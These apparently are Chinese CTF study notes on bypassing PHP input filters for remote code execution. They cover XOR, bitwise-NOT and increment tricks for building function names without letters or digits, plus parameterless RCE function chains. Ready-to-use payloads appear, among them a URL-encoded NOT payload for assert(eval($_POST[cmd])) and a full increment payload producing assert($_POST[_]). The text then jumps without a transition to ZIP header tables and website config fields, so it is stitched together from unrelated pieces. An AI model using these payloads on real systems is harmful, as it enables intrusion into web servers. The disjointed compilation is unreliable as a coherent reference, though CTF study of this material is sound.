利用各种非数字字母的字符，经过各种变换（异或，取反，自增），构造出单个的字母字符，然后把单个字符拼接成函数名，进行动态执行。
核心实现方法
1.异或
php7有一种特性叫做函数的动态调用，即在字符串上加一个括号就可以调用和字符串同名的函数
例如：
("phpinfo")();
而其中的字符串可以是任意形式，例如拼接：("php"."info") 或者运算的结果
异或运算，本质是得到这样的字符串然后括起来，进行命令操作
这里的异或，指的是php按位异或，在php 中，两个字符异或后，得到的依然是一个字符！
例如：将字符“A”和“?”进行异或：
得到：~
它是如何计算的呢，过程如下：
首先将 A 和 ? 分别转换为对应的ASCII码，A变为65，?变为63
然后将其转换为对应的二进制数，A变为1000001，？变为111111 接下来就进行运算，异或的运算规则是相同为0，不同为1 
A:1000001?:0111111(少一位，前面补0) 结果：  1111110
接下来将其二进制转换为对应十进制数，1111110对应的十进制数为126，根据ASCII码表可知126对应的是，所以这个时候得到的字符就是
因此，我们利用这种思路，就可以借助异或构造payload。
2.取反
取反其实是利用了不可见字符，我们对一个字符进行两次取反，得到的还是其本身。当我们进行一次取反过后，对其进行URL编码，再对其进行取反，此时可以得到可见的字符，它的本质其实还是这个字符本身，然后因为取反用的多是不可见字符，所以这里就达到了一种绕过的目的
取反运算符(~)的作用
在PHP中，~是按位取反运算符，它对一个数的每一位二进制位进行取反操作（0变1，1变0）9。例如：
echo ~3; // 输出-4echo ~'a'; // 输出一个不可见字符
取反绕过的核心是：
将想要执行的PHP代码进行取反操作
将取反后的结果进行URL编码
通过eval等函数执行取反后的代码
因为取反后的字符大多是不可见字符，可以绕过基于正则表达式的字符过滤。
具体实现步骤
基本payload构造:
假设我们要执行phpinfo();，可以按照以下步骤构造payload：
对”phpinfo”进行取反：
echo ~'phpinfo'; // 输出不可见字符
对取反结果进行URL编码：
echo urlencode(~'phpinfo'); // 输出"%8F%97%8F%96%91%99%90"
最终payload格式：
?code=(~%8F%97%8F%96%91%99%90)();
注意括号的使用：取反部分要用括号括起来，最后的分号不能少5。
以CTF题目为例，当遇到如下过滤条件时：
if(preg_match("/[A-Za-z0-9]+/",$code)){    die("NO.");}@eval($code);
我们可以使用取反绕过：
?code=(~%8F%97%8F%96%91%99%90)();  // 执行phpinfo()?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9C%92%9B%A2%D6%D6);// 相当于assert(eval($_POST[cmd]));
可以使用以下PHP代码生成取反payload：
3.自增
什么是自增绕过？
自增绕过是一种在PHP代码中，当字母和数字被严格过滤时，通过利用PHP的类型转换和自增运算符(++)特性来构造所需字符的技术。它允许攻击者在无法直接输入字母数字的情况下，逐步”构建”出执行命令所需的字符7。
基本行为：
在PHP中，自增运算符有两种形式：
前置自增(++$a)：先增加变量的值，然后返回新值
后置自增($a++)：先返回变量的当前值，然后增加变量的值
例如：
$a = 'A';echo ++$a; // 输出'B'echo $a++; // 输出'B'(但$a的值变为'C')
为什么自增可以用于RCE绕过？
当Web应用过滤了所有字母和数字时，传统的RCE方法(如直接输入system('ls'))无法使用。但PHP中：
空数组[]可以转换为字符串’Array’
字符串可以通过自增逐步构建出需要的字符
利用这些特性可以构造出函数名和参数7
核心原理:
从空数组开始构建字符串
$_ = [];        // 创建一个空数组$_ = @$_[''];   // 尝试访问不存在的键，返回NULL并转换为空字符串$_ = $_['!'=='@']; // '!'=='@'返回false，转换为0，相当于$_ = $_[0]
利用自增构建字符
PHP中字符串的自增遵循字母表顺序：
$_ = 'A';echo ++$_; // 输出'B'$_ = 'Z';echo ++$_; // 输出'AA' (类似于Excel的列命名)
构建完整函数调用
通过逐步自增，可以从空字符串开始构建出如assert、system等关键函数名，以及执行命令所需的参数7。
Payload解析
下面是一个典型的自增绕过Payload，用于执行assert($_POST[_])：
$_=[];$_=@"$_";         // $_ = 'Array'$_=$_['!'=='@'];   // $_ = 'A'$___=$_;           // $___ = 'A'$__=$_;            // $__ = 'A'$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// 经过18次自增，$__ = 'S'$___.=$__;         // $___ = 'AS'$___.=$__;         // $___ = 'ASS'$__=$_;            // 重置$__ = 'A'$__++;$__++;$__++;$__++;// 经过4次自增，$__ = 'E'$___.=$__;         // $___ = 'ASSE'$__=$_;            // 重置$__ = 'A'$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// 经过17次自增，$__ = 'R'$___.=$__;         // $___ = 'ASSER'$__=$_;            // 重置$__ = 'A'$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// 经过19次自增，$__ = 'T'$___.=$__;         // $___ = 'ASSERT'$____='_';         // $____ = '_'$__=$_;            // 重置$__ = 'A'$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// 经过15次自增，$__ = 'P'$____.=$__;        // $____ = '_P'$__=$_;            // 重置$__ = 'A'$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// 经过14次自增，$__ = 'O'$____.=$__;        // $____ = '_PO'$__=$_;            // 重置$__ = 'A'$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// 经过18次自增，$__ = 'S'$____.=$__;        // $____ = '_POS'$__=$_;            // 重置$__ = 'A'$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;// 经过19次自增，$__ = 'T'$____.=$__;        // $____ = '_POST'$_=$$____;         // $_ = $_POST$___($_[_]);       // assert($_POST[_])
使用时配合POST参数：_=phpinfo();即可执行任意PHP代码7。
优缺点:
优点：
完全不依赖字母和数字字符
在严格过滤环境下仍能工作
可以构建任意函数名和参数
缺点：
Payload通常较长且复杂
需要PHP环境支持字符串自增行为
对PHP版本有一定要求(某些版本行为可能不同)
二、无参数RCE
无参RCE是一种特殊的代码执行漏洞，攻击者可以在不直接传递参数的情况下，通过构造特定的函数调用链来实现远程代码执行。以下是关于PHP无参RCE的详细介绍：
成因
PHP无参RCE的成因主要与以下几个方面有关：
代码逻辑缺陷：某些PHP代码可能会对用户输入进行不安全的处理，例如使用eval()函数直接执行用户输入的代码，而没有对输入进行严格的过滤
正则表达式绕过：某些情况下，开发者可能会使用正则表达式来过滤用户输入，但攻击者可以通过构造特定的函数调用链来绕过这些过滤
PHP函数特性：PHP中存在一些无参数的函数或可以通过特定方式构造参数的函数，这些函数可以被攻击者利用
利用方式
利用PHP无参RCE的关键在于构造无参数的函数调用链，以实现代码执行。以下是一些常见的利用方式：
利用无参数函数：
scandir()：获取当前目录下的文件列表
localeconv()：返回包含本地数字及货币格式信息的数组，可以用于构造特定的字符
current()、pos()：获取数组的第一个值
array_rand()、array_reverse()：操作数组以获取特定值
构造文件路径：
通过getcwd()、dirname()等函数构造文件路径，结合scandir()获取目标文件
读取文件内容：
利用highlight_file()、show_source()、readfile()等函数读取文件内容
命令执行：
使用eval()、assert()等函数执行代码
示例
以下是一个典型的无参RCE场景：
攻击者可以通过构造类似以下的exp参数来绕过过滤并执行代码：
exp=print_r(scandir(current(localeconv())));
通过current(localeconv())构造小数点，进而调用scandir()获取当前目录下的文件列表
PHP相关函数
附：PHP官方文档的函数介绍：https://www.php.net/manual/zh/indexes.functions.php
一、HTTP相关函数
1. getallheaders()
功能：获取所有HTTP请求头，返回关联数组
利用：从请求头中获取可控数据
// 示例：获取User-Agent头end(getallheaders()); // 获取最后一个头
2. get_defined_vars()
功能：返回所有已定义变量的多维数组
利用：获取GET/GET/_POST等超全局变量
current(current(get_defined_vars())); // 获取第一个变量
二、会话控制函数
3. session_id()
功能：获取/设置当前会话ID
利用：通过设置恶意session ID执行代码
session_id('evilcode'); session_start();
4. session_start()
功能：启动新会话或重用现有会话
利用：配合session_id()使用
三、本地化函数
5. localeconv()
功能：返回本地化数字格式信息
关键利用：返回的数组第一个元素是小数点(.)
current(localeconv()); // 得到点字符"."
四、文件系统函数
6. scandir()
功能：列出目录中的文件和目录
利用：目录遍历核心函数
scandir('.'); // 列出当前目录
7. chdir()
功能：改变当前目录
利用：配合scandir()跳转目录
chdir('..'); // 跳到上级目录
8. getcwd() / grtpwd()
功能：获取当前工作目录
利用：获取路径信息
getcwd(); // 如"/var/www/html"
9. dirname()
功能：返回路径中的目录部分
利用：目录跳转
dirname('/var/www'); // 返回"/var"
五、数组操作函数
10. current() / pos()
功能：返回数组当前元素
利用：获取数组第一个元素
current(scandir('.')); // 第一个文件
11. array_reverse()
功能：返回逆序数组
利用：改变数组顺序
end(array_reverse(scandir('.'))); // 获取第一个文件
12. array_flip()
功能：交换键值
利用：改变数组结构
array_flip(['a'=>1,'b'=>2]); // [1=>'a',2=>'b']
13. array_rand()
功能：随机返回数组键名
利用：随机选择文件
scandir('.')[array_rand(scandir('.'))];
14. next() / prev() / end()
功能：移动数组指针
利用：遍历数组
end(scandir('.')); // 最后一个文件next(scandir('.')); // 第二个文件
六、输出函数
15. print_r()
功能：打印易读的变量信息
利用：输出数组内容
print_r(scandir('.'));
16. show_source() / highlight_file()
功能：语法高亮显示文件源码
利用：读取文件
show_source(end(scandir('.')));
17. readfile() / file_get_contents()
功能：读取文件内容
利用：读取flag
readfile('flag.txt');
七、编码转换函数
18. chr() / ord()
功能：ASCII码与字符互转
利用：构造特定字符
chr(65); // 'A'ord('A'); // 65
19. hex2bin()
功能：十六进制转二进制
利用：构造字符串
hex2bin('414243'); // 'ABC'
20. urldecode()
功能：URL解码
利用：解码特殊字符
urldecode('%41'); // 'A'
八、数学函数
21. phpversion()
功能：获取PHP版本
利用：判断环境
floor(phpversion()); // 主版本号
22. rand() / time()
功能：随机数/时间戳
利用：生成临时数据
rand(1,100);time();
23. localtime()
功能：返回本地时间数组
利用：获取数字
localtime()[0]; // 秒数

HEX	含义
50 4B 03 04	这是zip的头文件标记（0x04034b50），对应文本PK
14 00	解压文件所需的 pkware 版本
00 00	全局方式位标记（有无加密）
08 00	压缩方式（0x0008，对应Deflated）
AA 84	最后修改文件时间（遵循MS-DOS时间格式）
5F 5B	最后修改文件日期（遵循MS-DOS时间格式）
6A B1 EC C9	CRC-32校验和（0xC9ECB16A）
19 00 00 00	压缩后尺寸
18 00 00 00	未压缩尺寸
08 00	文件名长度
00 00	扩展记录长度
66 6C 61 67 2E 74 78 74	文件名（对应flag.txt）

HEX	含义
50 4B 01 02	目录中文件文件头标记
1F 00	压缩使用的 pkware 版本
14 00	解压文件所需 pkware 版本
00 00	全局方式位标记（有无加密）
08 00	压缩方式
AA 84	最后修改文件时间
5F 5B	最后修改文件日期
6A B1 EC C9	CRC-32校验和
16 00 00 00	压缩后尺寸
18 00 00 00	未压缩尺寸
08 00	文件名长度
24 00	扩展字段长度
00 00	文件注释长度（0 字节，表示没有注释）
00 00	磁盘开始号（0，表示文件不跨磁盘）
00 00	内部文件属性
20 00 00 00	外部文件属性
00 00 00 00	局部头部偏移量
66 6C 61 67 2E 74 78 74	文件名（对应flag.txt）
0A 00 20 00 … DC 01	扩展字段（长度为36字节，这是由上面的扩展字段长度24 00决定的。这是ZIP64、NTFS时间戳等扩展信息的存放位置）

HEX	含义
50 4B 05 06	目录结束标记
00 00	当前磁盘编号（因为该ZIP文件没有分卷，不跨越多张磁盘，所以从0开始）
00 00	目录区开始磁盘编号（同上，表示中央目录也位于第一个磁盘上）
01 00	本磁盘上纪录总数（表示当前磁盘上有1条中央目录记录）
01 00	目录区中纪录总数（这是整个ZIP文件中最重要的计数之一，它表明这个ZIP文件中总共包含1个文件）
5A 00 00 00	目录区尺寸大小（十进制90字节。这指的是从50 4B 01 02开始到中央目录记录结束的所有字节长度）
3C 00 00 00	目录区对第一张磁盘的偏移量（中央目录相对于存档起始位置的偏移量。小端序，0x0000003C = 十进制 60 字节。这意味着，解压软件需要从ZIP文件开头跳过60个字节，就能找到中央目录（即 PK\x01\x02 签名）
00 00	ZIP 文件注释长度（0表示ZIP文件没有全局注释）
无	ZIP文件注释内容（因为注释长度为0，所以这里没有数据）

加密算法	全局方式位标记 (二进制)	典型十六进制值	原理与特点
未加密	xxxx xxxx xxxx xxx0	`00 00`, `08 00`	第0位 = 0。总开关关闭，文件未加密。
PKWARE 传统加密	xxxx xxxx xxxx xxx1	`01 00`, `09 00`	第0位 = 1，且第6位和第11位均为0。这是ZIP格式最初定义的弱加密算法。
AES 加密	xxxx xxx1 xxxx 1xx1	`01 09`, `01 41`, `01 63`	第0位=1（加密），且第6位=1，第11位=1。这是WinZip开发并标准化的强加密。

项目	内容
title	网站的标题
subtitle	副标题
description	页面描述
keywords	页面关键字
author	你的名字
language	网站使用的语言（zh-CN）
timezone	网站时区（Asia/Shanghai）